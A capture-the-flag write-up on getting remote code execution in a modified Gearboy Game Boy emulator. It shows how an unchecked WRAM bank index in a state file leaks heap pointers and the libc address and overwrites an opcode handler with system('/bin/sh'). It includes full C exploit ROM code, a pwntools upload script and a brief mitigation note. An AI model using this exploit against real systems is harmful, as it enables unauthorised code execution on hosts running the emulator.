---
documentclass: extarticle
geometry: margin=2cm
title: Gearboy Writeup
author: sinitax
fontsize: 12pt
---

## Exploit

The task is to gain remote code execution (at least to the point of
reading the contents of the flag file) by manipulating only a Game Boy
ROM and state file, which are run on the server using a modified,
headless version of [*Gearboy*](https://github.com/drhelius/Gearboy),
a Game Boy emulator.

My immediate suspicion fell on missing checks for the state file rather
than the ROM, because the state can be saved at any time and it's
generally easier to forget a check before every use than a check
performed once when loading the ROM.

Inspecting the source code of `GearboyCore::LoadState`, we find that the
emulator's functionality is split across many classes, each with its own
`LoadState`, e.g. `Processor::LoadState` and `Memory::LoadState`.

`Memory::LoadState` loads, among other things, various memory bank buffers
as well as the values that control which of those banks are selected. Since
the address space of the Game Boy is limited (16-bit address space), parts
of the memory must be swapped out to give access to larger amounts.
Often an index is used to indicate which memory bank is in use,
as is the case with `WRAM1`:

```cpp
u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}
```

As long as `m_bCGB` (a flag enabling Game Boy Color mode) is set, the
backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`.
The value of `m_bCGB` is determined by special-purpose bytes in the
ROM, which we control.

Since `m_iCurrentWRAMBank` is loaded as part of the state and its value
is not sanitized, modifying it in the state file lets us
essentially mmap an arbitrary piece of memory into the address space of our
emulated game. When the running ROM reads from or writes to `0xD000-0xE000`,
it will instead access memory at an address we control.
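
The address computation behind this can be modelled in a few lines. This is a minimal sketch and not Gearboy code: `host_address` and the example buffer address are hypothetical, and the `0x1000` bank stride is taken from `GetWRAM1` above.

```python
WRAM1_START = 0xD000  # start of the switchable WRAM window seen by the ROM
BANK_SIZE = 0x1000    # bank stride used by Memory::GetWRAM1


def host_address(wram_banks: int, bank: int, gb_addr: int) -> int:
    """Host address touched when the ROM accesses gb_addr (hypothetical helper)."""
    if not WRAM1_START <= gb_addr < WRAM1_START + BANK_SIZE:
        raise ValueError("address outside the WRAM1 window")
    return wram_banks + BANK_SIZE * bank + (gb_addr - WRAM1_START)


# Made-up buffer address, for illustration only.
example_base = 0x5555_0000_0000

# A negative bank index moves the window below the start of the buffer.
assert host_address(example_base, -0x13, 0xD000) == example_base - 0x13000
```

Because the bank index is a signed integer with no bounds check, any 4 KiB-aligned window relative to `m_pWRAMBanks` is reachable in this model.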

But where to write when ASLR's enabled?

To get around ASLR we need to find objects on the heap with consistent
offsets to the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by
running `gdbserver` in the docker container and observing the surrounding
memory and pointers of objects allocated closely before or after. The
fact that each session is a freshly spawned docker container helps
with consistency.

Doing this, we find a heap layout that is consistent on every first
run in the docker container: the `Processor` object is
at an offset of `-0x126a0` from `m_pWRAMBanks`, and the `Memory` object
is at an offset of `-0xd0` from the `Processor` object, i.e. `-0x12770`
from `m_pWRAMBanks`. By setting `m_iCurrentWRAMBank` to `-0x13` in the
state file, the window at `0xD000` starts `0x13000` bytes before
`m_pWRAMBanks`, so we can access the `Processor` object at
`0x13000-0x126a0+0xD000=0xD960` and the `Memory` object at
`0x13000-0x12770+0xD000=0xD890`.
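
The bank index and the in-window addresses follow from the observed heap offsets by a floor division. The sketch below only reproduces that arithmetic; `window_for` is a hypothetical helper name, and the offsets are the ones quoted above.

```python
BANK_SIZE = 0x1000
WRAM1_START = 0xD000


def window_for(offset):
    """Return (bank index, Game Boy address) for a byte offset relative to m_pWRAMBanks."""
    # divmod floors, so a negative offset yields a negative bank
    # and a non-negative remainder inside the 4 KiB window.
    bank, within = divmod(offset, BANK_SIZE)
    return bank, WRAM1_START + within


processor_offset = -0x126a0               # Processor relative to m_pWRAMBanks
memory_offset = processor_offset - 0xd0   # Memory sits 0xd0 bytes before Processor

print([hex(v) for v in window_for(processor_offset)])  # ['-0x13', '0xd960']
print([hex(v) for v in window_for(memory_offset)])     # ['-0x13', '0xd890']
```

Both objects fall into the same 4 KiB window, which is why a single bank value is enough to reach them.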

For every instruction, the processor resolves the function for handling
an opcode by looking it up in a table using the opcode as an index. This
`opcodeTable` is a member of the `Processor` object and as such stored
on the heap. By reading one of these function pointers and subtracting
its offset in the binary we can recover the base address at which the
gearboy emulator is loaded.
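
As a sketch of that step, assuming the first 8 bytes of `opcodeTable` hold the address of the opcode `0x00` handler and that this handler sits at offset `0x1d420` in the binary (the constant used in the ROM code at the end of this writeup), the base can be recovered as follows. The function name and the sample address are made up for illustration.

```python
import struct

OP00_HANDLER_OFFSET = 0x1d420  # offset of the opcode 0x00 handler, from the ROM code


def image_base(leaked: bytes) -> int:
    """Turn the first 8 leaked bytes of opcodeTable into the load address of the binary."""
    (handler,) = struct.unpack("<Q", leaked[:8])  # little-endian 64-bit pointer
    base = handler - OP00_HANDLER_OFFSET
    if base & 0xfff:
        # A load address is page aligned; anything else hints at wrong offsets.
        raise ValueError("recovered base is not page aligned")
    return base


# Made-up leak, for illustration only.
sample = struct.pack("<Q", 0x5555_5555_4000 + OP00_HANDLER_OFFSET)
assert image_base(sample) == 0x5555_5555_4000
```

The alignment check is a cheap sanity test that the assumed offset matches the binary actually running on the server.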

Now that we know the base address and, as a result, the address of the
GOT, the usual next step is to leak libc by reading the GOT,
calculate the address of `system` and overwrite a function pointer
to call `system`. The only problem is that we are still just a ROM in
an emulator and only have access to the memory mapped into `0xD000-0xE000`.

We need to look for another access primitive.

This time, however, we are not limited to the contents of our state and ROM files.
We can manipulate the `Memory` and `Processor` objects directly!

Looking through the source code again we find a good candidate:

```cpp
u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}
```

We have already set `m_bCGB`, and `m_iCurrentLCDRAMBank` is loaded from the
state file. As such, we can make accesses to `0x8000-0x9000` be backed by the
`m_pLCDRAMBank1` buffer, whose pointer we now control.

We set `m_pLCDRAMBank1` in the `Memory` object to point to the GOT
entry of `free`, whose address is calculated from the base address. We can then
read the address of `free` from `0x8000`, derive the libc base and calculate
the address of `system`.
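
The pointer arithmetic for this step is sketched below. The three offsets are the constants from the ROM code at the end of this writeup and are specific to the binary and libc in the challenge container; the function names and sample addresses are hypothetical.

```python
FREE_GOT_OFFSET = 0x4ad78     # GOT slot of free, relative to the image base
FREE_LIBC_OFFSET = 0x9a6d0    # offset of free inside the target libc
SYSTEM_LIBC_OFFSET = 0x52290  # offset of system inside the target libc


def free_got_address(image_base: int) -> int:
    """Address to store in m_pLCDRAMBank1 so that 0x8000 maps onto the GOT slot."""
    return image_base + FREE_GOT_OFFSET


def system_address(leaked_free: int) -> int:
    """Derive the address of system from the leaked address of free."""
    libc_base = leaked_free - FREE_LIBC_OFFSET
    return libc_base + SYSTEM_LIBC_OFFSET


# Made-up addresses, for illustration only.
assert free_got_address(0x5555_5555_4000) == 0x5555_5559_ed78
assert system_address(0x7f00_0000_0000 + FREE_LIBC_OFFSET) == 0x7f00_0005_2290
```

With a different libc build the two libc offsets would have to be looked up again.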

To finally call `system`, we overwrite a function pointer in
`Processor::opcodeTable` and execute the corresponding opcode.
We ensure the first argument to `system` points to the string **/bin/sh**
by writing it to the address of the `Processor` object, as this is the address
in `rdi` when `system` is called. Since `opcodeTable` is the first
member of `Processor`, we need to choose an opcode whose table entry does
not overlap the space used for the string and which is not executed
before the pointer has been fully written (as would be the case with the load
instructions). The `stop` instruction (opcode `0x10`) is a good fit here.
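
The overlap constraint can be checked with a small sketch. It assumes each `opcodeTable` entry is `0x10` bytes wide, which is what the `0x10*0x10` offset in the ROM code at the end of this writeup implies; `entries_clobbered` is a hypothetical helper.

```python
ENTRY_SIZE = 0x10  # assumed size of one opcodeTable entry, per the ROM code's 0x10*0x10


def entries_clobbered(payload: bytes) -> set:
    """Opcodes whose table entries overlap a payload written at offset 0 of Processor."""
    return {offset // ENTRY_SIZE for offset in range(len(payload))}


command = b"/bin/sh\x00"
stop_opcode = 0x10

print(sorted(entries_clobbered(command)))  # [0], only the opcode 0x00 entry is hit
print(hex(stop_opcode * ENTRY_SIZE))       # 0x100, offset of the stop entry
assert stop_opcode not in entries_clobbered(command)
```

Under this assumption the string only overwrites the entry for opcode `0x00`, so the entry for `stop` at offset `0x100` can be replaced independently.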

### Mitigation

This attack can be mitigated by sanitizing the values loaded from the
state file. This would have prevented the initial out-of-bounds
read/write and, as such, the subsequent RCE. For `m_iCurrentWRAMBank`,
this can be implemented as a simple range check.
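
A range check of this kind might look like the sketch below. It is written in Python for brevity, whereas the real fix would live in the C++ `Memory::LoadState`. The bank counts are assumptions (eight 4 KiB WRAM banks and two VRAM banks, as on Game Boy Color hardware), and `validate_bank` is a hypothetical helper.

```python
WRAM_BANK_COUNT = 8     # assumption: eight 4 KiB banks back m_pWRAMBanks
LCD_RAM_BANK_COUNT = 2  # assumption: two VRAM banks


def validate_bank(value: int, bank_count: int, name: str) -> int:
    """Reject bank indices that would point outside the backing buffer."""
    if not 0 <= value < bank_count:
        raise ValueError(f"{name} out of range: {value}")
    return value


# The value used by the exploit is rejected, a regular one passes.
assert validate_bank(1, WRAM_BANK_COUNT, "m_iCurrentWRAMBank") == 1
try:
    validate_bank(-0x13, WRAM_BANK_COUNT, "m_iCurrentWRAMBank")
except ValueError as err:
    print(err)  # m_iCurrentWRAMBank out of range: -19
```

Rejecting the state file on a failed check, rather than clamping the value, avoids silently loading a corrupted state.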

\newpage

**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/}

```C
#include "stdint.h"
#include "string.h"

void
main(void)
{
	volatile static uint8_t *processor_gb;
	volatile static uint8_t *memory_gb;
	volatile static uint8_t *free_got_gb;
	volatile static uint64_t op0x00;
	volatile static uint64_t base;
	volatile static uint64_t libc;
	volatile static uint64_t free_got;
	volatile static uint64_t target;

	/* WRAM BANK = -0x13 */
	processor_gb = (void*) 0xD960;
	memory_gb = processor_gb - 0xd0;

	/* get base from op0x00 */
	op0x00 = *(uint64_t*)processor_gb;
	base = op0x00 - 0x1d420;
	free_got = base + 0x4ad78;

	/* change lcdrambank pointer to access got */
	*(uint64_t*)(memory_gb+0x90) = free_got;
	free_got_gb = (void*) 0x8000;

	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;

	target = libc + 0x52290;
	strcpy((char*)processor_gb, "/bin/sh");
	*(uint64_t*)(processor_gb+0x10*0x10) = target;

	__asm \
		stop \
	__endasm;

	while (1);
}
```

\newpage

**Upload and state modification script:**

```python
import struct
from base64 import b64encode
from sys import argv
from pwn import *

rom = list(open("main.gb", "rb").read())
state = list(open("main.state", "rb").read())

# set m_iCurrentWRAMBank
for i,v in enumerate(struct.pack("<i", -0x13)):
    state[0x10000+i] = v

# set m_iCurrentLCDRAMBank
for i,v in enumerate(struct.pack("<i", 1)):
    state[0x10004+i] = v

io = process(argv[1:])

io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))

io.interactive()
```